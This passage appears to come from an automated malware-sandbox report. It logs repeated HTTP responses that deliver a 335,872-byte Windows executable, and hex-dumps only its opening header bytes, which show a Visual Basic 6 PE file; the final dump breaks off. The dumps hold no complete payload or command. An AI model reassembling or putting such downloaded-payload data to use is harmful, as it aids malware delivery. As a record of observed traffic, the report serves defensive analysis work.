00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:00:05 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:00:08 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:00:08 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:00:09 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:00:14 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:00:14 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:00:14 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:00:38 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 